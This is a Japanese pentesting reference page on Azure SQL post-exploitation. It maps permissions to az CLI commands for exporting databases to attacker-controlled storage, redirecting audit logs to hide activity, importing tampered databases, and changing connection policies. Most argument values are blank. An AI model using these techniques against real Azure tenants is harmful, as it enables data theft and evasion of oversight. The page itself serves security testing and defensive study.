# Az - SQL Database Post Exploitation {{#include ../../../banners/hacktricks-training.md}} ## SQL Database Post Exploitation SQL Databaseに関する詳細情報は以下を参照してください: {{#ref}} ../az-services/az-sql.md {{#endref}} ### "Microsoft.Sql/servers/databases/read", "Microsoft.Sql/servers/read" && "Microsoft.Sql/servers/databases/write" これらの権限を持つ攻撃者は、侵害された環境内でデータベースを作成および更新することができます。このポストエクスプロイト活動により、攻撃者は悪意のあるデータを追加したり、データベースの設定を変更したり、さらなる持続性のためにバックドアを挿入したりすることができ、操作を妨害したり、追加の悪意のある行動を可能にしたりする可能性があります。 ```bash # Create Database az sql db create --resource-group --server --name # Update Database az sql db update --resource-group --server --name --max-size ``` ### "Microsoft.Sql/servers/elasticPools/write" && "Microsoft.Sql/servers/elasticPools/read" これらの権限を持つ攻撃者は、侵害された環境内でelasticPoolsを作成および更新できます。このポストエクスプロイト活動により、攻撃者は悪意のあるデータを追加したり、データベースの設定を変更したり、さらなる持続性のためにバックドアを挿入したりすることができ、操作を妨害したり、追加の悪意のある行動を可能にしたりする可能性があります。 ```bash # Create Elastic Pool az sql elastic-pool create \ --name \ --server \ --resource-group \ --edition \ --dtu # Update Elastic Pool az sql elastic-pool update \ --name \ --server \ --resource-group \ --dtu \ --tags ``` ### "Microsoft.Sql/servers/auditingSettings/read" && "Microsoft.Sql/servers/auditingSettings/write" この権限を持つことで、Azure SQL Serverの監査設定を変更または有効にすることができます。これにより、攻撃者や認可されたユーザーが監査構成を操作し、痕跡を隠したり、監査ログを自分の管理下にある場所にリダイレクトしたりする可能性があります。これにより、セキュリティ監視が妨げられたり、行動を追跡することができなくなったりする可能性があります。注意:Blob Storageを使用してAzure SQL Serverの監査を有効にするには、監査ログを保存できるストレージアカウントを接続する必要があります。 ```bash az sql server audit-policy update \ --server \ --resource-group \ --state Enabled \ --storage-account \ --retention-days 7 ``` ### "Microsoft.Sql/locations/connectionPoliciesAzureAsyncOperation/read", "Microsoft.Sql/servers/connectionPolicies/read" && "Microsoft.Sql/servers/connectionPolicies/write" この権限を持つことで、Azure SQL Serverの接続ポリシーを変更できます。この機能は、サーバーレベルの接続設定を有効にしたり変更したりするために悪用される可能性があります。 ```bash az sql server connection-policy update \ --server \ --resource-group \ --connection-type ``` ### "Microsoft.Sql/servers/databases/export/action" この権限を持つことで、Azure SQL Serverからストレージアカウントにデータベースをエクスポートできます。この権限を持つ攻撃者または認可されたユーザーは、データベースから敏感なデータをエクスポートして自分が管理する場所に持ち出すことができ、重大なデータ漏洩リスクを引き起こします。これを実行するには、ストレージキーを知っておくことが重要です。 ```bash az sql db export \ --server \ --resource-group \ --name \ --storage-uri \ --storage-key-type SharedAccessKey \ --admin-user \ --admin-password ``` ### "Microsoft.Sql/servers/databases/import/action" この権限を持つことで、Azure SQL Serverにデータベースをインポートできます。この権限を持つ攻撃者または認可されたユーザーは、悪意のあるまたは操作されたデータベースをアップロードする可能性があります。これにより、機密データの制御を獲得したり、インポートされたデータベース内に有害なスクリプトやトリガーを埋め込むことができます。さらに、自分のAzureサーバーにインポートすることもできます。注意: サーバーはAzureサービスとリソースがサーバーにアクセスすることを許可する必要があります。 ```bash az sql db import --admin-user \ --admin-password \ --name \ --server \ --resource-group \ --storage-key-type SharedAccessKey \ --storage-key \ --storage-uri "https://.blob.core.windows.net/bacpac-container/MyDatabase.bacpac" ``` {{#include ../../../banners/hacktricks-training.md}}